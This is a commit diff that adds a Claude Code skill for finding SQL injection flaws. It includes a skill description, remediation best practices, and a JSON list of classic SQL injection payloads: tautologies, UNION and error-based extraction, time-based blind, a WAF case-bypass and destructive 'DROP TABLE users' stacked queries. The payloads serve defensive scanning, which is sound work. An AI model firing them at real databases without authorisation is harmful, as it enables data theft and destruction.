Initial commit

skills/sql-injection-detector/SKILL.md

@@ -0,0 +1,56 @@
+---
+name: detecting-sql-injection-vulnerabilities
+description: |
+  This skill enables Claude to detect SQL injection vulnerabilities in code. It uses the sql-injection-detector plugin to analyze codebases, identify potential SQL injection flaws, and provide remediation guidance. Use this skill when the user asks to find SQL injection vulnerabilities, scan for SQL injection, or check code for SQL injection risks. The skill is triggered by phrases like "detect SQL injection", "scan for SQLi", or "check for SQL injection vulnerabilities".
+allowed-tools: Read, Write, Edit, Grep, Glob, Bash
+version: 1.0.0
+---
+
+## Overview
+
+This skill empowers Claude to proactively identify and address SQL injection vulnerabilities within a codebase. By leveraging the sql-injection-detector plugin, Claude can perform comprehensive scans, pinpoint potential security flaws, and offer actionable recommendations to mitigate risks. This ensures more secure and robust applications.
+
+## How It Works
+
+1. **Initiate Scan**: Upon receiving a relevant request, Claude activates the sql-injection-detector plugin.
+2. **Code Analysis**: The plugin analyzes the codebase, examining code patterns, input vectors, and query contexts.
+3. **Vulnerability Identification**: The plugin identifies potential SQL injection vulnerabilities, categorizing them by severity.
+4. **Report Generation**: A detailed report is generated, outlining the identified vulnerabilities, their locations, and recommended remediation steps.
+
+## When to Use This Skill
+
+This skill activates when you need to:
+- Audit a codebase for SQL injection vulnerabilities.
+- Secure a web application against SQL injection attacks.
+- Review code changes for potential SQL injection risks.
+- Understand how SQL injection vulnerabilities occur and how to prevent them.
+
+## Examples
+
+### Example 1: Securing a Web Application
+
+User request: "Scan my web application for SQL injection vulnerabilities."
+
+The skill will:
+1. Activate the sql-injection-detector plugin.
+2. Scan the web application's codebase for potential SQL injection flaws.
+3. Generate a report detailing any identified vulnerabilities, their severity, and remediation recommendations.
+
+### Example 2: Reviewing Code Changes
+
+User request: "Check these code changes for potential SQL injection risks."
+
+The skill will:
+1. Activate the sql-injection-detector plugin.
+2. Analyze the provided code changes for potential SQL injection vulnerabilities.
+3. Provide feedback on the security implications of the changes and suggest improvements.
+
+## Best Practices
+
+- **Input Validation**: Always validate and sanitize user inputs to prevent malicious data from entering the system.
+- **Parameterized Queries**: Utilize parameterized queries or prepared statements to prevent SQL injection attacks.
+- **Least Privilege**: Grant database users only the necessary privileges to minimize the impact of a potential SQL injection attack.
+
+## Integration
+
+This skill integrates seamlessly with other code analysis and security plugins within the Claude Code ecosystem. It can be used in conjunction with static analysis tools, dynamic testing frameworks, and vulnerability management systems to provide a comprehensive security solution.

skills/sql-injection-detector/assets/README.md

@@ -0,0 +1,7 @@
+# Assets
+
+Bundled resources for sql-injection-detector skill
+
+- [ ] sqli_payloads.json: JSON file containing a list of SQL injection payloads for different attack vectors.
+- [ ] remediation_templates/: Directory containing code templates for parameterized queries in various languages (Python, JavaScript, etc.).
+- [ ] example_code/: Directory containing vulnerable and secure code examples for SQL injection.

skills/sql-injection-detector/assets/sqli_payloads.json

@@ -0,0 +1,131 @@
+{
+  "_comment": "SQL Injection Payloads for different attack vectors.",
+  "payloads": [
+    {
+      "_comment": "Basic SQL Injection payloads",
+      "type": "basic",
+      "description": "Simple single quote injection.",
+      "payload": "' OR '1'='1",
+      "database": "all",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q=' OR '1'='1"
+    },
+    {
+      "_comment": "Numeric context bypass",
+      "type": "numeric",
+      "description": "Bypass numeric context with string injection.",
+      "payload": "1 OR 1=1",
+      "database": "all",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/item?id=1 OR 1=1"
+    },
+    {
+      "_comment": "String concatenation for MySQL",
+      "type": "string_concat",
+      "description": "String concatenation in MySQL.",
+      "payload": "\" UNION SELECT user(), database() -- -",
+      "database": "mysql",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q=\" UNION SELECT user(), database() -- -"
+    },
+    {
+      "_comment": "String concatenation for PostgreSQL",
+      "type": "string_concat",
+      "description": "String concatenation in PostgreSQL.",
+      "payload": "' || (SELECT user) || '",
+      "database": "postgresql",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q=' || (SELECT user) || '"
+    },
+    {
+      "_comment": "String concatenation for SQL Server",
+      "type": "string_concat",
+      "description": "String concatenation in SQL Server.",
+      "payload": "'+(SELECT user)+'",
+      "database": "sqlserver",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q='+(SELECT user)+'"
+    },
+    {
+      "_comment": "String concatenation for Oracle",
+      "type": "string_concat",
+      "description": "String concatenation in Oracle.",
+      "payload": "'||(SELECT user FROM dual)||'",
+      "database": "oracle",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q='||(SELECT user FROM dual)||'"
+    },
+    {
+      "_comment": "Error-based SQL injection (MySQL)",
+      "type": "error_based",
+      "description": "Error-based SQL injection using `extractvalue()` in MySQL.",
+      "payload": "' AND extractvalue(rand(),concat(0x3a,(select user()))) #",
+      "database": "mysql",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q=' AND extractvalue(rand(),concat(0x3a,(select user()))) #"
+    },
+    {
+      "_comment": "Time-based blind SQL injection (MySQL)",
+      "type": "time_based",
+      "description": "Time-based blind SQL injection using `sleep()` in MySQL.",
+      "payload": "' AND IF(substring(user(),1,1)='r',sleep(5),1) #",
+      "database": "mysql",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q=' AND IF(substring(user(),1,1)='r',sleep(5),1) #"
+    },
+    {
+      "_comment": "Boolean-based blind SQL injection (MySQL)",
+      "type": "boolean_based",
+      "description": "Boolean-based blind SQL injection (MySQL).",
+      "payload": "' AND 1=1 #",
+      "database": "mysql",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q=' AND 1=1 #"
+    },
+    {
+      "_comment": "Stacked queries (MySQL)",
+      "type": "stacked_queries",
+      "description": "Stacked queries injection in MySQL.",
+      "payload": "'; DROP TABLE users;--",
+      "database": "mysql",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q='; DROP TABLE users;--"
+    },
+    {
+      "_comment": "Bypass WAF with obfuscation",
+      "type": "waf_bypass",
+      "description": "Bypassing WAF with case randomization.",
+      "payload": "' UnIoN SeLeCt 1,2,3 -- -",
+      "database": "all",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q=' UnIoN SeLeCt 1,2,3 -- -"
+    },
+    {
+      "_comment": "Cookie-based injection",
+      "type": "cookie",
+      "description": "SQL injection in cookie value.",
+      "payload": "' OR '1'='1",
+      "database": "all",
+      "vector": "Cookie",
+      "example": "Set-Cookie: sessionid=' OR '1'='1"
+    },
+    {
+      "_comment": "Header-based injection",
+      "type": "header",
+      "description": "SQL injection in HTTP Header value.",
+      "payload": "' OR '1'='1",
+      "database": "all",
+      "vector": "HTTP Header",
+      "example": "X-Forwarded-For: ' OR '1'='1"
+    },
+    {
+      "_comment": "SQLite injection",
+      "type": "basic",
+      "description": "Basic SQLite injection.",
+      "payload": "'); DROP TABLE users; --",
+      "database": "sqlite",
+      "vector": "GET/POST Parameter",
+      "example": "https://example.com/search?q='); DROP TABLE users; --"
+    }
+  ]
+}

skills/sql-injection-detector/references/README.md

@@ -0,0 +1,8 @@
+# References
+
+Bundled resources for sql-injection-detector skill
+
+- [ ] sql_injection_cheatsheet.md: Comprehensive SQL injection cheat sheet with various attack vectors and payloads.
+- [ ] owasp_sql_injection_prevention_cheatsheet.md: OWASP SQL Injection Prevention Cheat Sheet for secure coding practices.
+- [ ] database_specific_syntax.md: Documentation on database-specific syntax for SQL injection attacks (MySQL, PostgreSQL, etc.).
+- [ ] orm_security.md: Best practices for securing ORM usage against SQL injection vulnerabilities.

skills/sql-injection-detector/scripts/README.md

@@ -0,0 +1,7 @@
+# Scripts
+
+Bundled resources for sql-injection-detector skill
+
+- [ ] sqli_scan.py: Script to automate SQL injection scanning with configurable payloads and target URLs.
+- [ ] sqli_exploit.py: Script to verify SQL injection vulnerabilities by attempting safe proof-of-concept exploits.
+- [ ] sqli_remediate.py: Script to generate parameterized query examples for remediation based on detected vulnerabilities.